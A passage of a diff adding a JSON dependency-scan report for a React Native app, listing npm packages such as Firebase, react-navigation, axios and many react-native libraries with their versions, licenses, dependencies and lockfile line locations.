"@react-native-firebase/crashlytics", + "Identifier": { + "PURL": "pkg:npm/%40react-native-firebase/crashlytics@23.4.0", + "UID": "234246fadd99a840" + }, + "Version": "23.4.0", + "Licenses": [ + "Apache-2.0" + ], + "Relationship": "direct", + "DependsOn": [ + "stacktrace-js@2.0.2" + ], + "Locations": [ + { + "StartLine": 2395, + "EndLine": 2400 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-native-firebase/messaging@23.4.0", + "Name": "@react-native-firebase/messaging", + "Identifier": { + "PURL": "pkg:npm/%40react-native-firebase/messaging@23.4.0", + "UID": "fac204599cdecae3" + }, + "Version": "23.4.0", + "Licenses": [ + "Apache-2.0" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 2402, + "EndLine": 2405 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-native-picker/picker@2.11.2", + "Name": "@react-native-picker/picker", + "Identifier": { + "PURL": "pkg:npm/%40react-native-picker/picker@2.11.2", + "UID": "e0e7e528da86d640" + }, + "Version": "2.11.2", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 2407, + "EndLine": 2410 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-native/new-app-screen@0.81.0", + "Name": "@react-native/new-app-screen", + "Identifier": { + "PURL": "pkg:npm/%40react-native/new-app-screen@0.81.0", + "UID": "af722b3bcad6e802" + }, + "Version": "0.81.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 2575, + "EndLine": 2578 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-navigation/drawer@7.5.9", + "Name": "@react-navigation/drawer", + "Identifier": { + "PURL": "pkg:npm/%40react-navigation/drawer@7.5.9", + "UID": "c23215343d3f695f" + }, + "Version": "7.5.9", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@react-navigation/elements@2.9.13", + "color@4.2.3", + "react-native-drawer-layout@4.1.13", + "use-latest-callback@0.2.5" + ], + "Locations": [ + { + "StartLine": 2617, + "EndLine": 2625 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-navigation/material-top-tabs@7.4.22", + "Name": "@react-navigation/material-top-tabs", + "Identifier": { + "PURL": "pkg:npm/%40react-navigation/material-top-tabs@7.4.22", + "UID": "22c61ecc303eb073" + }, + "Version": "7.4.22", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@react-navigation/elements@2.9.13", + "color@4.2.3", + "react-native-tab-view@4.3.0" + ], + "Locations": [ + { + "StartLine": 2636, + "EndLine": 2643 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-navigation/native@7.2.1", + "Name": "@react-navigation/native", + "Identifier": { + "PURL": "pkg:npm/%40react-navigation/native@7.2.1", + "UID": "1f697d936122757" + }, + "Version": "7.2.1", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@react-navigation/core@7.17.1", + "escape-string-regexp@4.0.0", + "fast-deep-equal@3.1.3", + "nanoid@3.3.11", + "use-latest-callback@0.2.5" + ], + "Locations": [ + { + "StartLine": 2645, + "EndLine": 2654 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-navigation/stack@7.4.9", + "Name": "@react-navigation/stack", + "Identifier": { + "PURL": "pkg:npm/%40react-navigation/stack@7.4.9", + "UID": "7f7b4fc3ebd1f8" + }, + "Version": "7.4.9", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@react-navigation/elements@2.9.13", + "color@4.2.3" + ], + "Locations": [ + { + "StartLine": 2663, + "EndLine": 2669 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "axios@1.12.2", + "Name": "axios", + "Identifier": { + "PURL": "pkg:npm/axios@1.12.2", + "UID": "cc6941597751af1b" + }, + "Version": "1.12.2", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "follow-redirects@1.15.11", + "form-data@4.0.4", + "proxy-from-env@1.1.0" + ], + "Locations": [ + { + "StartLine": 3499, + "EndLine": 3506 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "babel-plugin-inline-import@3.0.0", + "Name": "babel-plugin-inline-import", + "Identifier": { + "PURL": "pkg:npm/babel-plugin-inline-import@3.0.0", + "UID": "b82ef7d3ef5025da" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "require-resolve@0.0.2" + ], + "Locations": [ + { + "StartLine": 3526, + "EndLine": 3531 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "babel-plugin-module-resolver@5.0.3", + "Name": "babel-plugin-module-resolver", + "Identifier": { + "PURL": "pkg:npm/babel-plugin-module-resolver@5.0.3", + "UID": "55c9c5e33b3ef279" + }, + "Version": "5.0.3", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "find-babel-config@2.1.2", + "glob@9.3.5", + "pkg-up@3.1.0", + "reselect@4.1.8", + "resolve@1.22.10" + ], + "Locations": [ + { + "StartLine": 3554, + "EndLine": 3563 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "base-64@1.0.0", + "Name": "base-64", + "Identifier": { + "PURL": "pkg:npm/base-64@1.0.0", + "UID": "fc5af91f0bf45867" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 3684, + "EndLine": 3687 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "deprecated-react-native-prop-types@5.0.0", + "Name": "deprecated-react-native-prop-types", + "Identifier": { + "PURL": "pkg:npm/deprecated-react-native-prop-types@5.0.0", + "UID": "d667fe20844277bd" + }, + "Version": "5.0.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@react-native/normalize-colors@0.73.2", + "invariant@2.2.4", + "prop-types@15.8.1" + ], + "Locations": [ + { + "StartLine": 4582, + "EndLine": 4589 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "install@0.13.0", + "Name": "install", + "Identifier": { + "PURL": "pkg:npm/install@0.13.0", + "UID": "5588a39cf931a9f6" + }, + "Version": "0.13.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 6077, + "EndLine": 6080 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "mime@4.1.0", + "Name": "mime", + "Identifier": { + "PURL": "pkg:npm/mime@4.1.0", + "UID": "e3d9092eb25c0940" + }, + "Version": "4.1.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 7645, + "EndLine": 7648 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "moment@2.30.1", + "Name": "moment", + "Identifier": { + "PURL": "pkg:npm/moment@2.30.1", + "UID": "fdd42698ed1981d4" + }, + "Version": "2.30.1", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 7859, + "EndLine": 7862 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "npm@11.6.2", + "Name": "npm", + "Identifier": { + "PURL": "pkg:npm/npm@11.6.2", + "UID": "bff273ceed34d4b4" + }, + "Version": "11.6.2", + "Licenses": [ + "Artistic-2.0" + ], + "Relationship": "direct", + "DependsOn": [ + "@isaacs/string-locale-compare@1.1.0", + "@npmcli/arborist@9.1.6", + "@npmcli/config@10.4.2", + "@npmcli/fs@4.0.0", + "@npmcli/map-workspaces@5.0.0", + "@npmcli/package-json@7.0.1", + "@npmcli/promise-spawn@8.0.3", + "@npmcli/redact@3.2.2", + "@npmcli/run-script@10.0.0", + "@sigstore/tuf@4.0.0", + "abbrev@3.0.1", + "archy@1.0.0", + "cacache@20.0.1", + "chalk@5.6.2", + "ci-info@4.3.1", + "cli-columns@4.0.0", + "fastest-levenshtein@1.0.16", + "fs-minipass@3.0.3", + "glob@11.0.3", + "graceful-fs@4.2.11", + "hosted-git-info@9.0.2", + "ini@5.0.0", + "init-package-json@8.2.2", + "is-cidr@6.0.1", + "json-parse-even-better-errors@4.0.0", + "libnpmaccess@10.0.3", + "libnpmdiff@8.0.9", + "libnpmexec@10.1.8", + "libnpmfund@7.0.9", + "libnpmorg@8.0.1", + "libnpmpack@9.0.9", + "libnpmpublish@11.1.2", + "libnpmsearch@9.0.1", + "libnpmteam@8.0.2", + "libnpmversion@8.0.2", + "make-fetch-happen@15.0.2", + "minimatch@10.0.3", + "minipass@7.1.2", + "minipass-pipeline@1.2.4", + "ms@2.1.3", + "node-gyp@11.4.2", + "nopt@8.1.0", + "npm-audit-report@6.0.0", + "npm-install-checks@7.1.2", + "npm-package-arg@13.0.1", + "npm-pick-manifest@11.0.1", + "npm-profile@12.0.0", + "npm-registry-fetch@19.0.0", + "npm-user-validate@3.0.0", + "p-map@7.0.3", + "pacote@21.0.3", + "parse-conflict-json@4.0.0", + "proc-log@5.0.0", + "qrcode-terminal@0.12.0", + "read@4.1.0", + "semver@7.7.4", + "spdx-expression-parse@4.0.0", + "ssri@12.0.0", + "supports-color@10.2.2", + "tar@7.5.1", + "text-table@0.2.0", + "tiny-relative-date@2.0.2", + "treeverse@3.0.0", + "validate-npm-package-name@6.0.2", + "which@5.0.0" + ], + "Locations": [ + { + "StartLine": 8106, + "EndLine": 8175 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react@19.1.0", + "Name": "react", + "Identifier": { + "PURL": "pkg:npm/react@19.1.0", + "UID": "6b14c1d0e9c6671e" + }, + "Version": "19.1.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 9449, + "EndLine": 9452 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native@0.81.0", + "Name": "react-native", + "Identifier": { + "PURL": "pkg:npm/react-native@0.81.0", + "UID": "32d59a5b6a71bb6a" + }, + "Version": "0.81.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@jest/create-cache-key-function@29.7.0", + "@react-native/assets-registry@0.81.0", + "@react-native/codegen@0.81.0", + "@react-native/community-cli-plugin@0.81.0", + "@react-native/gradle-plugin@0.81.0", + "@react-native/js-polyfills@0.81.0", + "@react-native/normalize-colors@0.81.0", + "@react-native/virtualized-lists@0.81.0", + "abort-controller@3.0.0", + "anser@1.4.10", + "ansi-regex@5.0.1", + "babel-jest@29.7.0", + "babel-plugin-syntax-hermes-parser@0.29.1", + "base64-js@1.5.1", + "commander@12.1.0", + "flow-enums-runtime@0.0.6", + "glob@7.2.3", + "invariant@2.2.4", + "jest-environment-node@29.7.0", + "memoize-one@5.2.1", + "metro-runtime@0.83.3", + "metro-source-map@0.83.3", + "nullthrows@1.1.1", + "pretty-format@29.7.0", + "promise@8.3.0", + "react-devtools-core@6.1.5", + "react-refresh@0.14.2", + "regenerator-runtime@0.13.11", + "scheduler@0.26.0", + "semver@7.7.3", + "stacktrace-parser@0.1.11", + "whatwg-fetch@3.6.20", + "ws@6.2.3", + "yargs@17.7.2" + ], + "Locations": [ + { + "StartLine": 9388, + "EndLine": 9426 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-asset@2.1.1", + "Name": "react-native-asset", + "Identifier": { + "PURL": "pkg:npm/react-native-asset@2.1.1", + "UID": "b77a6f5b9ab7a037" + }, + "Version": "2.1.1", + "Licenses": [ + "ISC" + ], + "Relationship": "direct", + "DependsOn": [ + "fs-extra@7.0.1", + "lodash@4.17.21", + "npmlog@4.1.2", + "plist@3.1.0", + "sha1-file@1.0.4", + "xcode@2.1.0" + ], + "Locations": [ + { + "StartLine": 8900, + "EndLine": 8910 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-audio-recorder-player@3.5.3", + "Name": "react-native-audio-recorder-player", + "Identifier": { + "PURL": "pkg:npm/react-native-audio-recorder-player@3.5.3", + "UID": "49a4790aaaea8383" + }, + "Version": "3.5.3", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "dooboolab-welcome@1.3.2", + "react-native-audio-recorder-player@3.5.3" + ], + "Locations": [ + { + "StartLine": 8912, + "EndLine": 8918 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-blob-util@0.22.2", + "Name": "react-native-blob-util", + "Identifier": { + "PURL": "pkg:npm/react-native-blob-util@0.22.2", + "UID": "6c3135e74e12d54e" + }, + "Version": "0.22.2", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "base-64@0.1.0", + "glob@10.4.5" + ], + "Locations": [ + { + "StartLine": 8920, + "EndLine": 8926 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-bootsplash@6.3.11", + "Name": "react-native-bootsplash", + "Identifier": { + "PURL": "pkg:npm/react-native-bootsplash@6.3.11", + "UID": "f3b3a550f9bb804" + }, + "Version": "6.3.11", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@expo/config-plugins@10.1.2", + "@react-native-community/cli-config-android@18.0.0", + "@react-native-community/cli-config-apple@18.0.0", + "@react-native-community/cli-tools@18.0.0", + "commander@13.1.0", + "detect-indent@6.1.0", + "fs-extra@11.3.2", + "node-html-parser@7.0.1", + "picocolors@1.1.1", + "prettier@3.6.2", + "react-native-is-edge-to-edge@1.3.1", + "sharp@0.32.6", + "ts-dedent@2.2.0", + "xml-formatter@3.6.7" + ], + "Locations": [ + { + "StartLine": 8928, + "EndLine": 8946 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-camera-kit@15.1.0", + "Name": "react-native-camera-kit", + "Identifier": { + "PURL": "pkg:npm/react-native-camera-kit@15.1.0", + "UID": "d23409167892580d" + }, + "Version": "15.1.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 8948, + "EndLine": 8951 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-chart-kit@6.12.0", + "Name": "react-native-chart-kit", + "Identifier": { + "PURL": "pkg:npm/react-native-chart-kit@6.12.0", + "UID": "b60fa4e66db0a209" + }, + "Version": "6.12.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "lodash@4.17.21", + "paths-js@0.4.11", + "point-in-polygon@1.1.0" + ], + "Locations": [ + { + "StartLine": 8953, + "EndLine": 8960 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-collapsible@1.6.2", + "Name": "react-native-collapsible", + "Identifier": { + "PURL": "pkg:npm/react-native-collapsible@1.6.2", + "UID": "5faf0fa4462438d9" + }, + "Version": "1.6.2", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 8962, + "EndLine": 8965 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-contacts@8.0.10", + "Name": "react-native-contacts", + "Identifier": { + "PURL": "pkg:npm/react-native-contacts@8.0.10", + "UID": "389a30acdf88d126" + }, + "Version": "8.0.10", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 8967, + "EndLine": 8970 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-device-info@14.1.1", + "Name": "react-native-device-info", + "Identifier": { + "PURL": "pkg:npm/react-native-device-info@14.1.1", + "UID": "bc077344957ea5d9" + }, + "Version": "14.1.1", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 8972, + "EndLine": 8975 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-draggable-flatlist@4.0.3", + "Name": "react-native-draggable-flatlist", + "Identifier": { + "PURL": "pkg:npm/react-native-draggable-flatlist@4.0.3", + "UID": "81f3d35add2a9fde" + }, + "Version": "4.0.3", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@babel/preset-typescript@7.27.1" + ], + "Locations": [ + { + "StartLine": 8977, + "EndLine": 8982 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-exit-app@2.0.0", + "Name": "react-native-exit-app", + "Identifier": { + "PURL": "pkg:npm/react-native-exit-app@2.0.0", + "UID": "c8bb75c5a64e8dc" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 8991, + "EndLine": 8994 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-file-viewer@2.1.5", + "Name": "react-native-file-viewer", + "Identifier": { + "PURL": "pkg:npm/react-native-file-viewer@2.1.5", + "UID": "250dbb58ce6f0521" + }, + "Version": "2.1.5", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 8996, + "EndLine": 8999 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-fs@2.20.0", + "Name": "react-native-fs", + "Identifier": { + "PURL": "pkg:npm/react-native-fs@2.20.0", + "UID": "666dca1f39ebb11a" + }, + "Version": "2.20.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "base-64@0.1.0", + "utf8@3.0.0" + ], + "Locations": [ + { + "StartLine": 9008, + "EndLine": 9014 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-geocoding@0.5.0", + "Name": "react-native-geocoding", + "Identifier": { + "PURL": "pkg:npm/react-native-geocoding@0.5.0", + "UID": "2c1903ff44312484" + }, + "Version": "0.5.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 9016, + "EndLine": 9019 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-geolocation-service@5.3.1", + "Name": "react-native-geolocation-service", + "Identifier": { + "PURL": "pkg:npm/react-native-geolocation-service@5.3.1", + "UID": "9e4ae399cad21d97" + }, + "Version": "5.3.1", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 9021, + "EndLine": 9024 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-gesture-handler@2.28.0", + "Name": "react-native-gesture-handler", + "Identifier": { + "PURL": "pkg:npm/react-native-gesture-handler@2.28.0", + "UID": "2330c33dd477aa9c" + }, + "Version": "2.28.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@egjs/hammerjs@2.0.17", + "hoist-non-react-statics@3.3.2", + "invariant@2.2.4" + ], + "Locations": [ + { + "StartLine": 9026, + "EndLine": 9033 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-get-random-values@1.11.0", + "Name": "react-native-get-random-values", + "Identifier": { + "PURL": "pkg:npm/react-native-get-random-values@1.11.0", + "UID": "337af0db9c720463" + }, + "Version": "1.11.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "fast-base64-decode@1.0.0" + ], + "Locations": [ + { + "StartLine": 9035, + "EndLine": 9040 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-gif@1.0.3", + "Name": "react-native-gif", + "Identifier": { + "PURL": "pkg:npm/react-native-gif@1.0.3", + "UID": "3cdb0f9a5ca0c0a8" + }, + "Version": "1.0.3", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 9042, + "EndLine": 9045 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-google-maps@1.0.0", + "Name": "react-native-google-maps", + "Identifier": { + "PURL": "pkg:npm/react-native-google-maps@1.0.0", + "UID": "4a5ff2d9b2275251" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 9047, + "EndLine": 9050 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-image-crop-picker@0.41.6", + "Name": "react-native-image-crop-picker", + "Identifier": { + "PURL": "pkg:npm/react-native-image-crop-picker@0.41.6", + "UID": "4bda081040ef9d1e" + }, + "Version": "0.41.6", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 9052, + "EndLine": 9055 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-image-pan-zoom@2.1.12", + "Name": "react-native-image-pan-zoom", + "Identifier": { + "PURL": "pkg:npm/react-native-image-pan-zoom@2.1.12", + "UID": "785f8be9db5dfcdf" + }, + "Version": "2.1.12", + "Licenses": [ + "ISC" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 9057, + "EndLine": 9060 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-image-picker@8.2.1", + "Name": "react-native-image-picker", + "Identifier": { + "PURL": "pkg:npm/react-native-image-picker@8.2.1", + "UID": "6c4521b28dea70b3" + }, + "Version": "8.2.1", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 9062, + "EndLine": 9065 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-image-resizer@1.4.5", + "Name": "react-native-image-resizer", + "Identifier": { + "PURL": "pkg:npm/react-native-image-resizer@1.4.5", + "UID": "bc3de84e6da3d565" + }, + "Version": "1.4.5", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 9067, + "EndLine": 9070 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-image-zoom-viewer@3.0.1", + "Name": "react-native-image-zoom-viewer", + "Identifier": { + "PURL": "pkg:npm/react-native-image-zoom-viewer@3.0.1", + "UID": "ae50f32aaa385282" + }, + "Version": "3.0.1", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native-image-pan-zoom@2.1.12" + ], + "Locations": [ + { + "StartLine": 9072, + "EndLine": 9077 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-keyboard-aware-scroll-view@0.9.5", + "Name": "react-native-keyboard-aware-scroll-view", + "Identifier": { + "PURL": "pkg:npm/react-native-keyboard-aware-scroll-view@0.9.5", + "UID": "4f3606dbc17e1d88" + }, + "Version": "0.9.5", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "prop-types@15.8.1", + "react-native-iphone-x-helper@1.3.1" + ], + "Locations": [ + { + "StartLine": 9089, + "EndLine": 9095 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-keychain@10.0.0", + "Name": "react-native-keychain", + "Identifier": { + "PURL": "pkg:npm/react-native-keychain@10.0.0", + "UID": "a6b16cd554501f89" + }, + "Version": "10.0.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 9097, + "EndLine": 9100 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-linear-gradient@2.8.3", + "Name": "react-native-linear-gradient", + "Identifier": { + "PURL": "pkg:npm/react-native-linear-gradient@2.8.3", + "UID": "c292dc118638af27" + }, + "Version": "2.8.3", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 9102, + "EndLine": 9105 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-localize@3.5.2", + "Name": "react-native-localize", + "Identifier": { + "PURL": "pkg:npm/react-native-localize@3.5.2", + "UID": "edab615b8faaad91" + }, + "Version": "3.5.2", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 9107, + "EndLine": 9110 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-maps@1.26.14", + "Name": "react-native-maps", + "Identifier": { + "PURL": "pkg:npm/react-native-maps@1.26.14", + "UID": "6334e2d1b52d3e74" + }, + "Version": "1.26.14", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@types/geojson@7946.0.16" + ], + "Locations": [ + { + "StartLine": 9112, + "EndLine": 9117 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-markdown-display@7.0.2", + "Name": "react-native-markdown-display", + "Identifier": { + "PURL": "pkg:npm/react-native-markdown-display@7.0.2", + "UID": "98961c55e36d2ca6" + }, + "Version": "7.0.2", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "css-to-react-native@3.2.0", + "markdown-it@10.0.0", + "prop-types@15.8.1", + "react-native-fit-image@1.5.5" + ], + "Locations": [ + { + "StartLine": 9119, + "EndLine": 9127 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-mmkv@3.3.3", + "Name": "react-native-mmkv", + "Identifier": { + "PURL": "pkg:npm/react-native-mmkv@3.3.3", + "UID": "cfa3971fa76d5b51" + }, + "Version": "3.3.3", + "Licenses": [ + "(MIT AND BSD-3-Clause)" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 9129, + "EndLine": 9132 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-modal@14.0.0-rc.1", + "Name": "react-native-modal", + "Identifier": { + "PURL": "pkg:npm/react-native-modal@14.0.0-rc.1", + "UID": "29790bc44d98525" + }, + "Version": "14.0.0-rc.1", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native-animatable@1.4.0" + ], + "Locations": [ + { + "StartLine": 9148, + "EndLine": 9153 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-modal-datetime-picker@18.0.0", + "Name": "react-native-modal-datetime-picker", + "Identifier": { + "PURL": "pkg:npm/react-native-modal-datetime-picker@18.0.0", + "UID": "3567743dde0c2417" + }, + "Version": "18.0.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "prop-types@15.8.1" + ], + "Locations": [ + { + "StartLine": 9134, + "EndLine": 9139 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-modal-selector@2.1.2", + "Name": "react-native-modal-selector", + "Identifier": { + "PURL": "pkg:npm/react-native-modal-selector@2.1.2", + "UID": "d3657d4bd4948202" + }, + "Version": "2.1.2", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "prop-types@15.8.1" + ], + "Locations": [ + { + "StartLine": 9141, + "EndLine": 9146 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-multiple-select@0.5.12", + "Name": "react-native-multiple-select", + "Identifier": { + "PURL": "pkg:npm/react-native-multiple-select@0.5.12", + "UID": "25626653ff6d6c62" + }, + "Version": "0.5.12", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "prop-types@15.8.1" + ], + "Locations": [ + { + "StartLine": 9155, + "EndLine": 9160 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-orientation-locker@1.7.0", + "Name": "react-native-orientation-locker", + "Identifier": { + "PURL": "pkg:npm/react-native-orientation-locker@1.7.0", + "UID": "ae67864ef590d476" + }, + "Version": "1.7.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 9162, + "EndLine": 9165 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-otp-inputs@7.4.0", + "Name": "react-native-otp-inputs", + "Identifier": { + "PURL": "pkg:npm/react-native-otp-inputs@7.4.0", + "UID": "4ce641b7d28f4e1f" + }, + "Version": "7.4.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 9167, + "EndLine": 9170 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-pager-view@8.0.0", + "Name": "react-native-pager-view", + "Identifier": { + "PURL": "pkg:npm/react-native-pager-view@8.0.0", + "UID": "77e31ef13548e804" + }, + "Version": "8.0.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 9172, + "EndLine": 9175 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-paper@5.14.5", + "Name": "react-native-paper", + "Identifier": { + "PURL": "pkg:npm/react-native-paper@5.14.5", + "UID": "b6bf431c328d4729" + }, + "Version": "5.14.5", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@callstack/react-theme-provider@3.0.9", + "color@3.2.1", + "use-latest-callback@0.2.5" + ], + "Locations": [ + { + "StartLine": 9177, + "EndLine": 9184 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-permissions@5.4.2", + "Name": "react-native-permissions", + "Identifier": { + "PURL": "pkg:npm/react-native-permissions@5.4.2", + "UID": "4e2d9886576776c0" + }, + "Version": "5.4.2", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 9186, + "EndLine": 9189 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-photo-manipulator@1.9.2", + "Name": "react-native-photo-manipulator", + "Identifier": { + "PURL": "pkg:npm/react-native-photo-manipulator@1.9.2", + "UID": "8bd23c33e3cffd29" + }, + "Version": "1.9.2", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "color-rgba@3.0.0" + ], + "Locations": [ + { + "StartLine": 9191, + "EndLine": 9196 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-push-notification@8.1.1", + "Name": "react-native-push-notification", + "Identifier": { + "PURL": "pkg:npm/react-native-push-notification@8.1.1", + "UID": "3f0fc533c2812e00" + }, + "Version": "8.1.1", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 9198, + "EndLine": 9201 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-quick-crypto@0.7.17", + "Name": "react-native-quick-crypto", + "Identifier": { + "PURL": "pkg:npm/react-native-quick-crypto@0.7.17", + "UID": "5157b9faea04c0bc" 